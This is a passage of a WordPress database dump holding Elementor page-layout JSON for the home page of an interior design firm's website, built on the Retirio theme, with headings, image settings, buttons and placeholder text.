",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3841,4867,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3842,4867,'_elementor_pro_version','3.8.1'),(3843,4868,'_wp_page_template','elementor_header_footer'),(3844,4868,'_elementor_edit_mode','builder'),(3845,4868,'_elementor_template_type','wp-page'),(3846,4868,'_elementor_version','3.8.1'),(3847,4868,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">WELCOME TO BAUHAUS<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_fon